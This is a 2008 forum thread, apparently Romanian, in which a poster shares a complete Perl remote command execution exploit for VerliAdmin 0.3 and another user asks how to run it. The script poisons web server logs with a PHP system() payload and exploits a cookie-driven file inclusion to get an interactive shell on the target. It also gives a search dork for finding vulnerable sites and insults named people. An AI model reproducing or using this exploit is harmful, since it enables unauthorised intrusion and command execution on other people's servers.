Guest Nemessis Posted April 26, 2008 Report Posted April 26, 2008 http://www.milw0rm.com/exploits/3075#!/usr/bin/perl## VerliAdmin <= 0.3 Remote Command Execution Exploit# linK : http://bohyn.czechweb.cz/# d0rk: allinurl:"verliadmin"## ©od3d and f0unded by Kw3[R]Ln from Romanian Security Team a.K.A http://RST-CREW.NET# Contact: ciriboflacs[AT]YaHOo.com or SkaskLL@msn.com## Vurnerable Code in language.php: IF($_COOKIE['lang'] != "en")# {Include "language/".$_COOKIE['lang'].".php";}## PS: fuck CacaBot, psyke and Sad_dreamer.. [top lamerZ]# t0 psyke[pwn]: "y0ur c0de suqz. y0ur s1t3 suqz. y0u sm3ll 0f sh33p f3c3z. 3y3 th1nk y0u n33d t0 # t4k3 4n 0nl1n3 w3b d3s1gn c0urz3 0r s0m3th1ng. fuqn d0rk."use IO::Socket;use LWP::Simple;@apache=("../../../../../var/log/httpd/access_log","../../../../../var/log/httpd/error_log","../apache/logs/error.log","../apache/logs/access.log","../../apache/logs/error.log","../../apache/logs/access.log","../../../apache/logs/error.log","../../../apache/logs/access.log","../../../../apache/logs/error.log","../../../../apache/logs/access.log","../../../../../apache/logs/error.log","../../../../../apache/logs/access.log","../logs/error.log","../logs/access.log","../../logs/error.log","../../logs/access.log","../../../logs/error.log","../../../logs/access.log","../../../../logs/error.log","../../../../logs/access.log","../../../../../logs/error.log","../../../../../logs/access.log","../../../../../etc/httpd/logs/access_log","../../../../../etc/httpd/logs/access.log","../../../../../etc/httpd/logs/error_log","../../../../../etc/httpd/logs/error.log","../../.. /../../var/www/logs/access_log","../../../../../var/www/logs/access.log","../../../../../usr/local/apache/logs/access_log","../../../../../usr/local/apache/logs/access.log","../../../../../var/log/apache/access_log","../../../../../var/log/apache/access.log","../../../../../var/log/access_log","../../../../../var/www/logs/error_log","../../../../../var/www/logs/error.log","../../../../../usr/local/apache/logs/error_log","../../../../../usr/local/apache/logs/error.log","../../../../../var/log/apache/error_log","../../../../../var/log/apache/error.log","../../../../../var/log/access_log","../../../../../var/log/error_log");print "[RST] VerliAdmin <= 0.3 Remote Command Execution Exploit\n";print "[RST] need magic_quotes_gpc = off\n";print "[RST] c0ded by Kw3rLN from Romanian Security Team [ http://rst-crew.net ] \n\n";if (@ARGV < 3){ print "[RST] Usage: VerliAdmin.pl [host] [path] [apache_path]\n\n"; print "[RST] Apache Path: \n"; $i = 0; while($apache[$i]) { print "[$i] $apache[$i]\n";$i++;} exit();}$host=$ARGV[0];$path=$ARGV[1];$apachepath=$ARGV[2];print "[RST] Injecting some code in log files...\n";$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";print $socket "User-Agent: ".$CODE."\r\n";print $socket "Host: ".$host."\r\n";print $socket "Connection: close\r\n\r\n";close($socket);print "[RST] Shell!! write q to exit !\n";print "[RST] IF not working try another apache path\n\n";print "[shell] ";$cmd = <STDIN>;while($cmd !~ "q") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path."language.php HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Cookie: lang=".$apache[$apachepath]."%00&cmd=$cmd\r\n"; print $socket "Connection: close\r\n\n"; while ($raspuns = <$socket>) { print $raspuns; } print "[shell] "; $cmd = <STDIN>;} Quote
onix Posted April 27, 2008 Report Posted April 27, 2008 cum se fol ? deci bag in C:\ intru in cmd cd\perl nume.pl si mai departe? Quote
